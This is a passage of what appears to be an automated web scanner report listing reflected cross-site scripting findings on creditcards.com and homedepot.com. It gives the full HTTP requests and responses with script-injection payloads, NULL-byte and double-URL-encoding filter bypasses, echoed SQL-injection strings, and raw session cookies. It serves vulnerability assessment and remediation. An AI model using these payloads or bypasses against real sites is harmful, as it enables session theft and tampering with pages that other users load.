Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:40:28 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?pid=22145581ef0a1'><script>alert(1)</script>24470930548&pg=1477&pgpos=1' border=0 width=1 height=1>
...[SNIP]...

3.168. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc//%2522ns%253D%2522netsparker%25280x000132%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f8f4</script><script>alert(1)</script>9ab4d62f122 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529)?7f8f4</script><script>alert(1)</script>9ab4d62f122=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:50 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=1&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705475032517567&data3=0&sid=1889&c=7f8f4%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9ab4d62f122%3D1
Vary: Accept-Encoding
Content-Length: 2830
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:50 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="1"
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="1477;7f8f4</script><script>alert(1)</script>9ab4d62f122=1;1;0"
s.purchaseID="1022011061705475032517567"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="1477"
s.eVar26="1"
s.eVar18=s.c_r('s_vi');
...[SNIP]...

3.169. http://www.creditcards.com/oc//%2522ns%253D%2522netsparker%25280x000132%2529) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc//%2522ns%253D%2522netsparker%25280x000132%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 55469'><script>alert(1)</script>4d54fa68c8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc//%2522ns%253D%2522netsparker%25280x000132%2529)?55469'><script>alert(1)</script>4d54fa68c8c=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:46 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3798
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:46 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?55469'><script>alert(1)</script>4d54fa68c8c=1' border=0 width=1 height=1>
...[SNIP]...

3.170. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/Netsparker8d82b62392124f8783667c0217ea8f35/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eefbd</script><script>alert(1)</script>0bf80f3bad2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/Netsparker8d82b62392124f8783667c0217ea8f35/?eefbd</script><script>alert(1)</script>0bf80f3bad2=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:48 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=110244864+or+1%3D1--+&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705474870200155&data3=0&sid=1889&c=eefbd%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0bf80f3bad2%3D1
Vary: Accept-Encoding
Content-Length: 2866
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:48 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
prop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="110244864 or 1=1-- "
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="1477;eefbd</script><script>alert(1)</script>0bf80f3bad2=1;1;0"
s.purchaseID="1022011061705474870200155"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="1477"
s.eVar26="110244864 or 1=1-- "
s.eVa
...[SNIP]...

3.171. http://www.creditcards.com/oc/Netsparker8d82b62392124f8783667c0217ea8f35/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/Netsparker8d82b62392124f8783667c0217ea8f35/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45b7d'><script>alert(1)</script>6bf423f3e8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/Netsparker8d82b62392124f8783667c0217ea8f35/?45b7d'><script>alert(1)</script>6bf423f3e8a=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:44 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3832
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:44 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?45b7d'><script>alert(1)</script>6bf423f3e8a=1' border=0 width=1 height=1>
...[SNIP]...

3.172. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5f829'><script>alert(1)</script>0af0495fd87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/?5f829'><script>alert(1)</script>0af0495fd87=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:44 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3830
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:44 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>
...[SNIP]...
<IMG SRC='http://www.creditcards.com/xtrack.php?5f829'><script>alert(1)</script>0af0495fd87=1' border=0 width=1 height=1>
...[SNIP]...

3.173. http://www.creditcards.com/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daecb</script><script>alert(1)</script>0146b7f0103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /oc/Netsparkera7c38b9ccc0c4920bb6a55a29b67ffb4/?daecb</script><script>alert(1)</script>0146b7f0103=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.creditcards.com
Cookie: Apache=66.219.46.81.1308307377275850; PHPSESSID=147189003bcb08f66eb38005117f390d; SSBAL=node.web2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:47:49 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=1000&tid=&cid=9999&did=9999&fid=1477&pos=168534384%27+or+1%3D2--+&evid=102110617054257a6b9f5164de84f3a4&ref=&oid=1022011061705474926506862&data3=0&sid=1889&c=daecb%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0146b7f0103%3D1
Vary: Accept-Encoding
Content-Length: 2868
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 10:47:49 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
rop6=""
s.prop7=""
s.prop8=""
s.prop12=s.c_r('s_vi');
s.prop16="168534384' or 1=2-- "
/* Conversion Variables */
s.campaign=""
s.state=""
s.zip=""
s.events="purchase,event2"
s.products="1477;daecb</script><script>alert(1)</script>0146b7f0103=1;1;0"
s.purchaseID="1022011061705474926506862"
s.eVar1=""
s.eVar2=""
s.eVar3=""
s.eVar4=""
s.eVar5=""
s.eVar6=""
s.eVar7=""
s.eVar8=""
s.eVar25="1477"
s.eVar26="168534384' or 1=2-- "
s.eV
...[SNIP]...

3.174. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation [rpp parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

Issue detail

The value of the rpp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c565f"><a%20b%3dc>43cbc6cc4d0 was submitted in the rpp parameter. This input was echoed as c565f"><a b=c>43cbc6cc4d0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96c565f"><a%20b%3dc>43cbc6cc4d0 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?Ns=P_REP_PRC_MODE%7C1&storeId=10051&catalogId=10053&langId=-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85e5b7-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223792094%3a%3bC25%5fEXP%3d1360063792%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=4; s_pers=%20s_campaign%3Dno%2520value%7C1308225658356%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225658360%3B%20p_30%3DSubcategory%7C1308225658363%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

3.175. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fc4e"%3bd8f12afa488 was submitted in the keyword parameter. This input was echoed as 6fc4e";d8f12afa488 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E6fc4e"%3bd8f12afa488&omni=3&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 223539
Expires: Thu, 16 Jun 2011 12:16:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:16:44 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita8k%2fWC%5fTHD2%5fccaita8k%2f1308226604116%3a%3bC25%5fEXP%3d1360066604%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308311929;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 12:16:44 GMT;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e;Domain=.homedepot.com;Path=/
Set-Cookie: WC_PERSISTENT=tqx1JvL7fZTob7wvcbMP7n4Lz8k%3d%0a%3b2011%2d06%2d16+08%3a16%3a44%2e153%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051;Domain=.homedepot.com;Expires=Mon, 14-Jan-2013 23:20:12 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308230204153%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cYByz3dsBjam6QzikPcs59YfFjgQ%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://ww
...[SNIP]...
sparker(0x0000AB)MaliciousScriptReplaced6fc4e';d8f12afa488";s.prop37="3";s.prop4="'"-->MaliciousScriptReplacedMaliciousScriptReplacedMaliciousScriptReplacednetsparker(0x0000AB)MaliciousScriptReplaced6fc4e";d8f12afa488";s.prop8="0";var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.176. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload afb15%253cscript%253ealert%25281%2529%253c%252fscript%253ec38d2f33a46 was submitted in the keyword parameter. This input was echoed as afb15<script>alert(1)</script>c38d2f33a46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the keyword request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253Eafb15%253cscript%253ealert%25281%2529%253c%252fscript%253ec38d2f33a46&omni=3&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
